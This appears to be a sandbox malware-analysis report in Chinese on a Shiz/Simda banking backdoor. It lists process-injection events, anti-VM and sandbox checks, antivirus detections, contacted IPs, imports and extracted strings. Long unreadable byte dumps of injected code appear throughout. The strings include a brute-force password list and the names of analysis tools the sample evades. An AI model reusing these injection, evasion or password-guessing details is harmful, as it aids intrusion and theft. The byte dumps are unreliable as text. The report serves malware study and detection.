PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
success 1 0
1727545396.719125
WriteProcessMemory
process_handle: 0x000005e0
base_address: 0x02e34000
process_identifier: 348
buffer: ×1œ2ñ253s3ö3”5
success 1 0
1727545397.000125
WriteProcessMemory
process_handle: 0x000005e0
base_address: 0x02d90000
process_identifier: 1736
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P@@.text `.data  @À.reloc`@(@B
success 1 0
1727545397.000125
WriteProcessMemory
process_handle: 0x000005e0
base_address: 0x02d91000
process_identifier: 1736
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M ó¤Æ„ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
success 1 0
1727545397.016125
WriteProcessMemory
process_handle: 0x000005e0
base_address: 0x02de4000
process_identifier: 1736
buffer: ×1œ2ñ253s3ö3”5
success 1 0
1727545397.266125
WriteProcessMemory
process_handle: 0x000005e0
base_address: 0x03a30000
process_identifier: 1684
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P@@.text `.data  @À.reloc`@(@B
success 1 0
1727545397.266125
WriteProcessMemory
process_handle: 0x000005e0
base_address: 0x03a31000
process_identifier: 1684
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M ó¤Æ„ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
success 1 0
1727545397.281125
WriteProcessMemory
process_handle: 0x000005e0
base_address: 0x03a84000
process_identifier: 1684
buffer: ×1œ2ñ253s3ö3”5
success 1 0
尝试创建或修改系统证书 (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob
网络活动包含多个唯一的用户代理 (3 个事件)
process svchost.exe useragent Internal
process svchost.exe useragent Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
process ComputerZService.exe useragent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
对特定运行进程表示兴趣 (2 个事件)
进程:潜在的进程注入目标 svchost.exe
进程 system
通过注册表键的存在检测VirtualBox (1 个事件)
registry HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\PCI\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00
通过自定义固件检测虚拟机 (2 个事件)
Time & API Arguments Status Return Repeated
1727545401.3905
NtQuerySystemInformation
information_class: 76 (SystemFirmwareTableInformation)
failed 3221225507 0
1727545401.3905
NtQuerySystemInformation
information_class: 76 (SystemFirmwareTableInformation)
success 0 0
生成一些 ICMP 流量
文件已被 VirusTotal 上 66 个反病毒引擎识别为恶意 (50 out of 66 个事件)
ALYac Gen:Variant.Ulise.39843
APEX Malicious
AVG Win32:Shiz-JT [Trj]
Acronis suspicious
Ad-Aware Gen:Variant.Ulise.39843
AhnLab-V3 Trojan/Win32.Gen.C1571325
Alibaba Backdoor:Win32/Simda.650fe7e4
Antiy-AVL Trojan/Win32.Unknown
Arcabit Trojan.Ulise.D9BA3
Avast Win32:Shiz-JT [Trj]
Avira TR/Hijacker.Gen
Baidu Win32.Trojan-Spy.Shiz.b
BitDefender Gen:Variant.Ulise.39843
BitDefenderTheta AI:Packer.A4C1F93F1E
Bkav W32.AIDetectVM.malware
CAT-QuickHeal Trojan.Beaugrit.S16628
ClamAV Win.Trojan.Generic-6323528-0
Comodo TrojWare.Win32.Spy.Shiz.ZV@6ldvxf
CrowdStrike win/malicious_confidence_100% (W)
Cybereason malicious.315444
Cylance Unsafe
Cyren W32/Shiz.R.gen!Eldorado
DrWeb Trojan.PWS.Ibank.323
ESET-NOD32 a variant of Win32/Spy.Shiz.NBX
Emsisoft Gen:Variant.Ulise.39843 (B)
Endgame malicious (high confidence)
F-Prot W32/Shiz.R.gen!Eldorado
F-Secure Trojan.TR/Hijacker.Gen
FireEye Generic.mg.53efb5b3154447e4
Fortinet W32/Shiz.NBX!tr
GData Gen:Variant.Ulise.39843
Ikarus Backdoor.Win32.Simda
Invincea heuristic
Jiangmin Backdoor.Generic.axsv
K7AntiVirus Spyware ( 004cadd91 )
K7GW Spyware ( 004cadd91 )
Kaspersky HEUR:Backdoor.Win32.Generic
Lionic Trojan.Win32.Generic.m!e
MAX malware (ai score=85)
Malwarebytes Trojan.Banker
MaxSecure Trojan.Malware.300983.susgen
McAfee BackDoor-FDOB!53EFB5B31544
McAfee-GW-Edition BehavesLike.Win32.Backdoor.bh
MicroWorld-eScan Gen:Variant.Ulise.39843
Microsoft Backdoor:Win32/Simda.gen!B
NANO-Antivirus Trojan.Win32.Ibank.esrglb
Paloalto generic.ml
Panda Trj/Genetic.gen
Qihoo-360 Win32/Trojan.Carberp.B
Rising Backdoor.Generic!8.CE (TFE:dGZlOgPVgBt2iNDDHA)
连接到不再响应请求的 IP 地址(合法服务通常会保持运行) (18 个事件)
dead_host 162.255.119.102:80
dead_host 13.248.252.114:80
dead_host 44.221.84.105:80
dead_host 172.234.222.138:80
dead_host 178.162.217.107:80
dead_host 154.212.231.82:80
dead_host 199.191.50.83:80
dead_host 172.67.173.131:443
dead_host 23.253.46.64:80
dead_host 172.234.222.143:80
dead_host 85.17.31.122:80
dead_host 104.21.30.183:443
dead_host 178.162.203.226:80
dead_host 192.168.56.101:49188
dead_host 192.168.56.101:49193
dead_host 47.102.103.145:8000
dead_host 47.117.77.180:80
dead_host 13.248.169.48:80
可视化分析
二进制图像
数据导入图像 288x288
数据导入图像 224x224
数据导入图像 192x192
数据导入图像 160x160
数据导入图像 128x128
数据导入图像 96x96
数据导入图像 64x64
数据导入图像 32x32
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2011-08-02 17:26:00

PE Imphash

173abfa8f7d7adac2a90a2e42625b7d9

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00002b14 0x00002c00 6.115647371012377
.rdata 0x00004000 0x00001bf8 0x00001c00 6.098143094424814
.data 0x00006000 0x0005711c 0x00053800 6.759145336421315
.reloc 0x0005e000 0x0000099c 0x00000a00 6.07318440201103

Imports

Library MSVCRT.dll:
0x40412c wcsstr
0x404130 _snwprintf
0x404134 strstr
0x404138 _snprintf
0x40413c _except_handler3
0x404140 memset
0x404144 memcpy
Library SHELL32.dll:
0x404160 None
0x404164 SHGetFolderPathA
Library SHLWAPI.dll:
0x40416c PathAddBackslashA
0x404170 StrStrIA
0x404174 PathFileExistsA
0x404178 PathAppendA
Library ntdll.dll:
0x404190 RtlAdjustPrivilege
0x404194 RtlImageNtHeader
0x404198 RtlCreateUserThread
Library KERNEL32.dll:
0x40402c GetModuleFileNameW
0x404034 MoveFileA
0x404038 DeviceIoControl
0x40403c ExitProcess
0x404040 GlobalAddAtomA
0x404044 GlobalFindAtomA
0x404048 CopyFileA
0x40404c GetCurrentProcessId
0x404054 CreateFileW
0x404058 GetVersionExA
0x40405c FreeLibrary
0x404060 IsDebuggerPresent
0x404064 GetTickCount
0x404070 GetModuleFileNameA
0x404074 CreateFileA
0x404078 SetFilePointer
0x40407c MoveFileExA
0x404080 lstrcpynA
0x404084 SetEndOfFile
0x404088 UnlockFile
0x40408c LockFile
0x404090 SetFileTime
0x404094 WriteFile
0x404098 IsBadWritePtr
0x40409c ReadFile
0x4040a0 GetFileSizeEx
0x4040a4 GetLastError
0x4040a8 SetFileAttributesA
0x4040ac GetTempFileNameA
0x4040b0 GetFileTime
0x4040b4 GetTempPathA
0x4040b8 DeleteFileA
0x4040bc GetProcAddress
0x4040c0 GetModuleHandleA
0x4040c4 HeapAlloc
0x4040c8 HeapFree
0x4040cc GetProcessHeap
0x4040d0 HeapValidate
0x4040d4 GetCurrentProcess
0x4040d8 Sleep
0x4040e0 VirtualAlloc
0x4040e4 VirtualQuery
0x4040e8 Process32First
0x4040ec VirtualFree
0x4040f0 CreateRemoteThread
0x4040f4 OpenProcess
0x4040f8 CreateProcessA
0x4040fc Module32First
0x404104 VirtualAllocEx
0x404108 LoadLibraryA
0x40410c Process32Next
0x404114 Module32Next
0x404118 CloseHandle
0x40411c WriteProcessMemory
0x404120 SwitchToThread
Library USER32.dll:
0x404180 FindWindowA
0x404184 CharUpperA
0x404188 PostMessageA
Library ADVAPI32.dll:
0x404000 RegCreateKeyExA
0x404004 RegSetValueExA
0x404008 RegQueryValueExA
0x40400c RegOpenKeyExA
0x404010 RegFlushKey
0x404014 RegCloseKey
0x404018 OpenProcessToken
0x40401c GetTokenInformation
0x404020 GetUserNameA
Library ole32.dll:
0x4041a0 CoUninitialize
0x4041a4 CoCreateInstance
0x4041ac CoInitializeEx
Library OLEAUT32.dll:
0x40414c SysFreeString
0x404150 SysAllocString
0x404154 VariantClear
0x404158 VariantInit
L!This program cannot be run in DOS mode.
`%{`%{`%{i]a%{
b%{i]u%{`%z%{
Sa%{Rich`%{
`.rdata
@.data
.reloc
3WhxD@
_^[]_^
SSShD@
SSSSEPSSQ
URh,E@
@:u+W?
3_6MQh
U SV3Wu;
3EEEEEEj
EPhp@
_^[]UV39u
SVW3j@ESP];!
3SQ]EEE
MQURSSSSSSSPED
SVW3h$
KTEPQh
URUPWQR
@(E;|}uCPURh
t,MQWE
E_^[]U
U$VW=t@@
EPMQURV
t:UREPMQV
3EEEEEEEj
EPhp@
SVW3h
mE_^[]UjhR@
3QSSj&S
u;t2hM@
;t"]SE
SSShM@
TX\`dhlp
t0SDPj
^[]U`S3VSh
]]]E^DE
tAW=@@
SMQj(URV
MUSEPMj
SW=x@@
_[^]U4
W}}}}}
URhpN@
URURPA(=
uyMQhN@
RPA *}'E
QHWP3E5LA@
S3VWD$
D$ D$$D$(D$,j
P3hp@
0@:uD$0P
;t hE@
t)D$0HH
@:u|$0+OO
T$0RhN@
L$4Q$@
t$0PYL$
Q-;tDV
VD$4%3
L$4Q$H
;t hE@
L$0Qqh
U@+f=`A@
t=ehN@
fu@hN@
fu@hN@
UE}]MQ|E
x[h(O@
usEUR3u
URh8C@
P;|>h,O@
MU=XA@
uEEEPMU
EQ}UEq
EPRQOD
T$0RD$4
QSt$ t$$
T$,RVWS
u/MQREPj
SVW=p@@
Nwt\=>
tU=dotNh
3_^[]UVE
yd?BcsV
9F+Jb{h!kcF
iMX7e{
NKagj(hOTmR Mr
MuCuDY6Ag
2zQGWvB)
ADj\8PmC(
Ij5*WA z:L
&>Mb=LkI
<Gh^PF
*7R/mufO*}
mSwOR5o
L_}zi6
,RCfm&
\NOLLYDBG
wireshark.exe
dumpcap.exe
idag.exe
vmwaretray.exe
\\?\globalroot\systemroot\system32\vmx_fb.dll
SystemDrive
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
userinit
\\?\globalroot\systemroot\system32\drivers\ntfs.sys
ntdll.dll
RtlUniform
kernel32.dll
IsWow64Process
kernel
jHqA}
kdzbeO\
iLA`rqg
@l2u\E
a=-fAv
\cQkkbal
eLXaMQ:t
jiCn4Fg
c;d>jm
i]Wbgeq6l
8ROggW
A`Ugn1yiFa
fo%6hRw
[&wowG
eibkaEl
`MGiIwn>Jj
)WTg#.zfJa
h]+o*7
server
idontknow
administrator
666666
12345678
soccer
abc123
password1
football1
fuckyou
monkey
iloveyou1
superman1
slipknot1
jordan23
princess1
liverpool1
monkey1
baseball1
123abc
qwerty1
blink182
myspace1
user111
098765
qweryuiopas
qwerty
111111
password
123456
Windows Defender
MpClient.dll
WDEnable
\\.\KmxAgent
____AVP.Root
\\.\pipe\acsipc_server
\AVG\AVG9\dfncfg.dat
\AVG\AVG9\dfmcfg.dat
\PrevxCSI\csidb.csi
BL09n@:
j`4bOND
PTue Aug 2 12:53:17 20112
winlogon.exe
explorer.exe
\apppatch\
svchost.exe
Tue Aug 2 12:53:17 20111
user32.dll
HARDWARE\DESCRIPTION\System
SystemBiosVersion
test_item.exe
SANDBOX
MALNETVM
VIRUSCLONE
test user
\sand-box\
\cwsandbox\
\sandbox\
_snprintf
strstr
_snwprintf
wcsstr
MSVCRT.dll
SHGetFolderPathA
SHELL32.dll
PathFileExistsA
StrStrIA
PathAddBackslashA
PathAppendA
SHLWAPI.dll
RtlImageNtHeader
RtlCreateUserThread
RtlAdjustPrivilege
ntdll.dll
IsDebuggerPresent
GetTickCount
GetVolumeInformationA
GetEnvironmentVariableA
GetModuleFileNameA
CreateFileA
SetFilePointer
MoveFileExA
lstrcpynA
SetEndOfFile
UnlockFile
LockFile
SetFileTime
WriteFile
IsBadWritePtr
ReadFile
GetFileSizeEx
GetLastError
SetFileAttributesA
GetTempFileNameA
GetFileTime
GetTempPathA
DeleteFileA
GetProcAddress
GetModuleHandleA
HeapAlloc
HeapFree
GetProcessHeap
HeapValidate
GetCurrentProcess
FlushInstructionCache
VirtualAlloc
VirtualQuery
Process32First
VirtualFree
CreateRemoteThread
OpenProcess
CreateProcessA
Module32First
GetHandleInformation
VirtualAllocEx
LoadLibraryA
Process32Next
CreateToolhelp32Snapshot
Module32Next
CloseHandle
WriteProcessMemory
SwitchToThread
GetSystemWindowsDirectoryA
FreeLibrary
GetSystemTimeAsFileTime
GetModuleFileNameW
SetCurrentDirectoryA
MoveFileA
DeviceIoControl
ExitProcess
GlobalAddAtomA
GlobalFindAtomA
CopyFileA
GetCurrentProcessId
InterlockedDecrement
CreateFileW
GetVersionExA
KERNEL32.dll
FindWindowA
CharUpperA
PostMessageA
USER32.dll
RegSetValueExA
RegQueryValueExA
RegCreateKeyExA
RegOpenKeyExA
RegFlushKey
RegCloseKey
OpenProcessToken
GetTokenInformation
GetUserNameA
ADVAPI32.dll
CoCreateInstance
CoUninitialize
CoInitializeEx
CoInitializeSecurity
ole32.dll
OLEAUT32.dll
_except_handler3
memset
memcpy
jHqA}
kdzbeO\
iLA`rqg
@l2u\E
a=-fAv
\cQkkbal
eLXaMQ:t
jiCn4Fg
c;d>jm
i]Wbgeq6l
8ROggW
A`Ugn1yiFa
fo%6hRw
[&wowG
eibkaEl
`MGiIwn>Jj
)WTg#.zfJa
h]+o*7
L!This program cannot be run in DOS mode.
`.data
.reloc
EZXE_]
F<W|0xu
D0|L7$U
;sz;rv3;.E
E;s[SVQ
3VEEEEEEE=h]
E^]U83VWE
EEEEEEh]
wPhJaPej@h
WTU}uMu
D0,~*HM
M}uM(Ju
uFP+V4RP;
h[Au0PV
EPIMQV
EEEEh]
E}uMMq(
PR[_hmPj
L!This program cannot be run in DOS mode.
`.rdata
@.data
.reloc
SWWWWjPWW
WWSVjPWW
t WWVh
t<WWVh'
3VVVVjWVV
3VVVVjWVV
EEEEEEE
;}r^3j
EEEEEEE
WStS_^E
E3EEEEEEj
;}r_3j
]EEEEEE
3t^VVVVjWVV
_^[]U,
_^[]_^
[]UDSVW
WSPQRN
K_^3[]
Ju_^3[]
\}tX]EU
JU:t.O3
x[_3^]
T8u_^[]
SVW rf}
+E3t0M
9u_^[]
QUVUKOu
3Jt-SVx#33
D$<L$<
D$<D$<y
IJuD$<@D$<
QSRVPt
MUP<6WQSRE
MUPWQSR
QPR3_^[]
USQPPRN
MESVQU
EMRUPQVR
u&ESWPM
UEQMRPWQE
Mv:u}$
MUPQVWRE
MUPQVWR't
F;ur_^3[]
WWWWURWWP
u'URUEPMQj
@u+;ru
^u4MQh
u'MQMUREPj
u'URUEPMQj
@uVW+OO
MQMUREPj
E]UQEPh
^UHSV5P
PSEu<WP
fD$8SP\$<p
L$0QVD$8(
L$\T$`D$d
T$8L$TQRhZ
]EMfU9]
VWUEPMQjh
@u}Gkd+
WURUPj
SSV]Sj
URPXQV
URPXQV
URPXQV
EPQXRV
URPXQV
URPXQV
URPXQV
3+P3+P39X
URPXQV
@u+EEE
URPXQV
^[]U8E
]EEEEEE
;}ra3j
]EEEEEE
EEEEEE
;urj3j
EEEEEE
EEEEEE
;}rj3j
]3EEEEEEEj
Ut[Vh
}tXM3It.$
<>http
}UFJ;r
}tZU3t.
<>http
VU}EF;r
3_[UVu
EEE1X_
,_^[]U8
URWVuSV$E
u3;t Uh
u8V$t.
URUPMQVh
MQMREPVh
}7@}2j
GN_^[]Qh
NVPL$0QR
3fD$(D$*PfT$,
3EEEPS
UQ3E9E
tE;tASj
S-%50R
SVW3VEPE
PEMQSRP
@:u+V@3;t'x
@:u^E;t
RUEPSQR
@:u+V@3;t'x
@:u^E;t
3SRfMS
@:u3fE
SVW=XR
%_^[]UQS
]_^[Y]
u_^[Y]
MQPjE3@fE
^USVWh,
^ ^$fN
SSQSVR
D$0D$4D$8D$<
D$@D$DD$HD$L
D$@t$(t$$D$
AJu\$(L$
D$$SPS
;|$ u1|$
D$$SPS
3C\$(L$,
2_^[]U4
t$(t$$D$
AJu\$(L$
D$$SPS
;|$ u1|$
D$$SPS
3C\$(L$,
2_^[]U,
E};}u4}
tuEVPEV
_^[U4l
EEEEEEEPj
\$PD$T
j@T$HSRK
PSjj$S\$(D$TD
RD$DPSSSSSSS$
D$(D$,D$0$
PSjj$S\$8
PSSSSSSS$
;tD$(T$,=\Q
O9W=PMOAUWEEPMUw
u2_^[]
G8W._^[]
p;}^[3_f
+QM+RPQj
U4SVWj
QWj Wf}
PW_^[]
T$$RSD$,<
QT$8R||$
RD$8P:|$
PL$8QE
RD$8PE
SB6tTj
tg;u29
PQr_^[]
PQ_^[]
PQr_^[]
PQ_^[]
PQr_^[]
PQ_^[]
PQr_^[]
PQ_^[]
PQr_^[]
PQ_^[]
t5t1>0u,F
t5t1>0u,F
EEEEPE
_3^_^%L
S3VW9]
3EEEEEEj
;}r[3j
]EEEEEE
E4M0U,PE(QM$RU PE
M4U0E,QM(RU$PE QM
r3@tGEPVE<
r3@tCMQVE<
:U@VEPVE<
t#MQWE
PE+QM+S+P+
UEMRUPQR
]EUMh
RU+QM+RPQS
_^[]ULS
E?M};}
VuWV+RU+PSQR
_^[]U<S]
taURjSE<
F(MQjS
t;j8Ej
WPP(^]U
S3VW]]9]
WPP/C;]~}t
EM+|+MjVEM
taURjVE<
MUEMQjV
EMU|Pj
EM+E+MjVE
t(DHLE
t(DHLU
EMUEPj
PP_^[]
E^]US]
3WWj1P
L$lQj<P
T$0RWD$8<
uuD$ P'V\$ D$
D$$L$,T$ h
Vj'j#SPh
UQSVWEPh
<_^[]SVW
LSVWPQj
RJjV%PjV
t';t#j
u3_^[]
UQSVWj
E_^[]U,
u4V7t#S
;u0;t&5P
A A$A(A,_^[]
;r_^3[]
+_0^[]
A+_0^[]
+_0^[]
+_2^[]
0Nu;tLu2t
_^[UVu
@u+;u-t)t%3
BA;|[_3^]
UQSVW}
33M<-u
G<0|4<9
IF;r_^UE
?:tD;r_^[]
;:tXU;r_^[]
VPC$s(EH
UQSV9}
MA@M;M
3U;s^;s
>:tHU;r_^[]
u>2u08F
t5MQP*t
t/EPh@
DF^US]
3t9VW{
u*t"SW
tIE;v:PE
:u!E++R
MWQS#T
UDSVW}
=POSTu
=GET u
QRVD$$PD$
T$ RZ
T$$D$ RPu
WPV|$
G _^[]
_^[]_^[]
_^[]UU
Wt%t!t
G0;rRSV
QRD$0P
RD$8PD$
T$0+T$4t$
D$$VPS(N
_(+_,;s
3G$G(G,_^[]j
_^[]UVW}
@0;r_^]
Vs^]Vj
Eu@,Eu;
#_^3[]
u3Bk,R<
t"WWWW~
Ik,QW;
L$ QRt$@
uPG(PoK
D$0t?O
D$0L$,PQ
G +G$M
EPQj-^ R
t/=POSTu
}M}}9}
URVj"PE
EMQURj
MQWj)R
UuWPEQMRPh
@u+P={
U8S3VW=pQ
EEEEEEj
;ur[3j
]EEEEEE
U8S3VW=pQ
EEEEEEj
;ur[3j
]EEEEEE
Wu43D$
D$ D$$D$(D$,D$0D$4D$
Wu43D$
D$ D$$D$(D$,D$0D$4D$
WPQRSu
WPQRSbu
t[H$@ ;u"E
38t%>
u38t-$
URUPMQSh
@:u+V@3;t'x
@:u^E;t
3SRfM3
@:u3fE
totktg}
<#t/<
t'<*tP
CFG;u3;u
;t8;us+
@uMQ+RUPE
tdSVW]tGE
VR+PQV
u_^[h
UtSVWD$(P
QRWWSSP
D$DL$HD$\
fT$f<
WjBD$`(
L$h\$p\$t\$x\$|$
T$HSL$\QPRSD$(D$$VP
SSW6BM
T$BfD$@\$,
SPVD$4
SL$ Qj
SSV\$0
Sj(SPVD$0
SL$$Qj(T$dRV
Sj(SPV
\$ 9\$
t@;t<j
SWSPVD$0
SL$$QWRV
@u+PSD$ MT$
3QQ3PW
@u|$ +OO
3QQ3PV
T$ RVSW
3EEEVPE
@u+t4E
